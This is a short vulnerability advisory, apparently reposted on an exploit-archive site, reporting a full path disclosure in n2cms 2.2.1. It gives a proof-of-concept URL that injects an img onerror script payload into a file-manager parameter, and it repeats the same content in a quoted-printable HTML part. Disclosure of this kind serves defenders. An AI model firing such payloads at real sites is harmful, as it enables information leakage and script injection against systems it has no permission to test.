Home / exploits n2cms 2.2.1 Path Disclosure
Posted on 08 May 2015
--047d7bd6bb5a40b6a5051578e115 Content-Type: text/plain; charset=ISO-8859-1 # Affected software: n2cms # Type of vulnerability:full path disclosure # URL:n2cms.com # Discovered by: provensec # Website: provensec.com #version: *2.2.1* <http://n2cms.codeplex.com/releases> # Proof of concept http://demo.n2cms.com/N2/Files/FileSystem/File.aspx?selected=%2fupload%2f%22%3E%3Cimg%20src=d%20onerror=confirm(1);%3E1.php%2f manipulating the selected paramter will splash error which discloses system path --047d7bd6bb5a40b6a5051578e115 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable <div dir=3D"ltr"><div class=3D"gmail_default" style><span style=3D"font-fam= ily:'comic sans ms',sans-serif"></span><font face=3D"comic sans ms,= sans-serif"># Affected software: n2cms</font></div><div class=3D"gmail_def= ault" style><font face=3D"comic sans ms, sans-serif"># Type of vulnerabilit= y:full path disclosure</font></div><div class=3D"gmail_default" style><font= face=3D"comic sans ms, sans-serif"># URL:<a href=3D"http://n2cms.com">n2cm= s.com</a></font></div><div class=3D"gmail_default" style><font face=3D"comi= c sans ms, sans-serif"># Discovered by: provensec</font></div><div class=3D= "gmail_default" style><font face=3D"comic sans ms, sans-serif"># Website: <= a href=3D"http://provensec.com">provensec.com</a></font></div><div class=3D= "gmail_default" style><font face=3D"comic sans ms, sans-serif"><br></font><= /div><div class=3D"gmail_default" style><font face=3D"comic sans ms, sans-s= erif">#version:=A0</font><a href=3D"http://n2cms.codeplex.com/releases" sty= le=3D"color:rgb(0,150,219);text-decoration:none;font-family:Georgia,serif;f= ont-size:14.3999996185303px"><strong>2.2.1</strong></a><span style=3D"color= :rgb(51,51,51);font-family:Georgia,serif;font-size:14.3999996185303px">=A0<= /span></div><div class=3D"gmail_default" style><font face=3D"comic sans ms,= sans-serif"># Proof of concept</font><span style=3D"font-family:'comic= sans ms',sans-serif"></span></div><div class=3D"gmail_default" style><= span style=3D"font-family:'comic sans ms',sans-serif"><br></span></= div><div class=3D"gmail_default" style><font face=3D"comic sans ms, sans-se= rif"><a href=3D"http://demo.n2cms.com/N2/Files/FileSystem/File.aspx?selecte= d=3D%2fupload%2f%22%3E%3Cimg%20src=3Dd%20onerror=3Dconfirm(1);%3E1.php%2f">= http://demo.n2cms.com/N2/Files/FileSystem/File.aspx?selected=3D%2fupload%2f= %22%3E%3Cimg%20src=3Dd%20onerror=3Dconfirm(1);%3E1.php%2f</a><br></font><br= ><br></div><div class=3D"gmail_default" style><br></div><div class=3D"gmail= _default" style><br>manipulating the selected paramter will splash error wh= ich discloses system path=A0</div><div class=3D"gmail_default" style><br></= div><div class=3D"gmail_default" style>=A0</div></div> --047d7bd6bb5a40b6a5051578e115--
